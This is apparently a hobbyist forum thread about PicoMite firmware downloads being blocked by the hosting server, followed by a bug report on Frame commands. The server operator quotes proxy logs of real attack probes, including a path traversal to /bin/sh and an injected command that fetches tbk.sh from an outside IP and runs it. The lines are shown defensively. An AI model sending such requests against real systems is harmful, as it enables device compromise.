PicoMite Firmware Version 6.02.00a for use on ClockWorkPi PicoCalc

its probably your firewall. i had to add his server to my adguard whitelist. then it worked

Doesn’t help.

On my desktop, firewall is off, no ad blocking apps installed.
On my iPad, ad blocking has been deactivated.

No ad blocking on the router or network.

no no, not “ad”-blocking.

adguard is a whole firewall with DNS black and whitelisting. mine runs in my homeassistant, it did block the adress at first.

Twas much simpler, it was damaged fruit doing something it is not supposed to do.

Feb 21 20:46:55 raspi9 pound:  GET /download/ HTTP/1.1 - HTTP/1.1 200 OK
Feb 21 20:46:55 raspi9 pound:  GET /apple-touch-icon-precomposed.png HTTP/1.1 - HTTP/1.1 404 Not Found
Feb 21 20:46:55 raspi9 pound:  GET /apple-touch-icon-precomposed.png HTTP/1.1 - HTTP/1.1 404 Not Found
Feb 21 20:46:56 raspi9 pound:  GET /apple-touch-icon.png HTTP/1.1 - HTTP/1.1 404 Not Found
Feb 21 20:46:56 raspi9 pound:  GET /favicon.ico HTTP/1.1 - HTTP/1.1 404 Not Found
Feb 21 20:46:56 raspi9 pound:  GET /apple-touch-icon.png HTTP/1.1 - HTTP/1.1 404 Not Found
Feb 21 20:46:56 raspi9 pound:  GET /favicon.ico HTTP/1.1 - HTTP/1.1 404 Not Found
Feb 21 20:46:56 raspi9 f2b-pound[3595]: [Ban] 

Looking for icons at the server root is not nice, because I never had fruit getting in the request was identified as a attempt to traverse the tree. I had to adjust the rules to allow these /apple* requests in addition to /favicon.

I am using this for a reason, see the following from today:

Feb 21 05:06:19 raspi9 pound: (b692f440) e503 no back-end "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" from 154.58.233.195 188.174.151.33:80
Feb 21 17:07:21 raspi9 pound: (b6727440) e501 bad request "CONNECT www.baidu.com:443 HTTP/1.1" from 156.226.170.175
Feb 21 17:07:22 raspi9 pound: (b641b440) e501 bad request "CONNECT www.baidu.com:443 HTTP/1.1" from 156.226.170.175
Feb 21 19:16:30 raspi9 pound: (b6358440) e503 no back-end "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" from 20.238.121.35 ppp-188-174-151-33.dynamic.mnet-online.de
Feb 21 19:16:30 raspi9 pound: (b6317440) e503 no back-end "GET /sm.php HTTP/1.1" from 20.238.121.35 ppp-188-174-151-33.dynamic.mnet-online.de
Feb 21 19:16:30 raspi9 pound: (b6a74440) e503 no back-end "GET /sc.php HTTP/1.1" from 20.238.121.35 ppp-188-174-151-33.dynamic.mnet-online.de
Feb 21 19:16:30 raspi9 pound: (b64de440) e503 no back-end "GET /ioxi-o.php HTTP/1.1" from 20.238.121.35 ppp-188-174-151-33.dynamic.mnet-online.de
Feb 21 19:16:30 raspi9 pound: (b6970440) e503 no back-end "GET /admin.php HTTP/1.1" from 20.238.121.35 ppp-188-174-151-33.dynamic.mnet-online.de
Feb 21 20:46:03 raspi9 pound: (b6560440) e503 no back-end "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3B%20busybox%20rm%20tbk.sh%3B%20wget%20http%3A%2F%2F130.12.180.120%3A8080%2Ffile%2Ftbk.sh%3B%20busybox%20sh%20tbk.sh HTTP/1.1" from 123.240.12.253 188.174.151.33

As I have mentioned elsewhere, I was getting blocked when attempting to access from Chrome behind my work’s VPN.

pound.log:Feb 15 17:25:48 raspi9 pound: 216.66.8.36 GET /downal HTTP/1.1 - HTTP/1.1 404 Not Found
pound.log:Feb 16 21:59:15 raspi9 pound: 216.66.8.36 GET /download_b HTTP/1.1 - HTTP/1.1 404 Not Found
pound.log:Feb 17 20:09:16 raspi9 pound: 216.66.8.36 GET /down HTTP/1.1 - HTTP/1.1 404 Not Found
pound.log.1:Feb 11 10:18:45 raspi9 pound: 61.211.62.226 GET /download/picocalc_v6.01.00_rc27e.zip HTTP/1.1 - HTTP/1.1 404 Not Found
pound.log.1:Feb 14 01:02:41 raspi9 pound: 91.138.39.216 GET /download/picocalc_v6.02.01b1_beta.zip HTTP/1.1 - HTTP/1.1 404 Not Found
pound.log.2:Feb  4 12:43:38 raspi9 pound: 78.153.140.224 GET /download/.env.1 HTTP/1.1 - HTTP/1.1 404 Not Found

Every line above caused a 12 hour ban.

I think I found another bug in 6.02.01beta4 with the new Frame commands.

On page 15 of the Frame Command User Manual, it says Run will automatically close any existing frames leftover from a previous program. In my testing, it doesn’t. I have to issue a Frame Close command to cleanup, otherwise when the second program issues a Frame Create, I get a “Frame already exists” error…..Brian

u

Update…in fact, a frame is also supposed to be closed

  • after an error
  • When program ends normally

Those are not true either.

You will have to try again :grinning_face: with b5

Problem still there.

Maybe it isn’t a bug but rather an error in the documentation….brian